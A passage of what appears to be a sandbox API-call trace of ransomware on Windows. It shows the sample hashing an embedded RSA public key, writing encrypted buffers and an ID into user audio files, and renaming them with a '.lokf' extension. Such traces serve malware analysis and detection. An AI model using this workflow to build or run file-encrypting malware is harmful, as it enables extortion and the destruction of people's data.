KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.960] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.960] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0060.961] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.961] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.961] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.961] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0060.961] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.961] GetLastError () returned 0x0 [0060.961] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.961] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0060.961] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.961] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.961] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.962] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x126b0) returned 0x9c8dae8 [0060.962] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0060.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86968 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86100 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c869b0 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86118 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86148 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86160 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0060.962] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.962] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0060.962] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86148 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86160 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86160 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c86148 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86160 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86148 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.963] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.963] GetCurrentThreadId () returned 0x9e0 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8bef0 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.963] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.964] GetCurrentThreadId () returned 0x9e0 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86148 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86160 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86130 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86178 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86148 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c86148 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.965] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.965] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x9c87710 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86148 | out: hHeap=0x660000) returned 1 [0060.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32947b0 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.966] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b87a8 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c87710 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86178 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86160 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86130 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.966] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c86118 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c869b0 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.967] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8dae8*, nNumberOfBytesToWrite=0x126ac, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8dae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x126ac, lpOverlapped=0x0) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8dae8 | out: hHeap=0x660000) returned 1 [0060.967] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x126b1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.967] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.967] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0060.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.968] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0060.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.968] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.968] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0060.968] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.968] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.968] CloseHandle (hObject=0x5cc) returned 1 [0060.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290508 [0060.969] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0060.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3290508 | out: hHeap=0x660000) returned 1 [0060.969] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\gnUl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\gnul.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\gnUl.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\gnul.mp3.lokf")) returned 1 [0060.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.970] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.971] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf79d3a50, ftCreationTime.dwHighDateTime=0x1d4cc0b, ftLastAccessTime.dwLowDateTime=0x673f0c0, ftLastAccessTime.dwHighDateTime=0x1d4ccdc, ftLastWriteTime.dwLowDateTime=0x673f0c0, ftLastWriteTime.dwHighDateTime=0x1d4ccdc, nFileSizeHigh=0x0, nFileSizeLow=0xa958, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jDMSBY8z.wav", cAlternateFileName="")) returned 1 [0060.971] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262a80 [0060.971] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xee) returned 0x329e1f0 [0060.971] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262a80 | out: hHeap=0x660000) returned 1 [0060.971] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\jDMSBY8z.wav") returned=".wav" [0060.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\iCD5MmspTIMUES\\ULJQyyPz2Ie5aZRk\\jDMSBY8z.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\m4--j\\icd5mmsptimues\\uljqyypz2ie5azrk\\jdmsby8z.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.971] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=43352) returned 1 [0060.971] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.974] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa932, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.974] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.974] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0060.974] HeapFree (in: hHeap=0x660000, 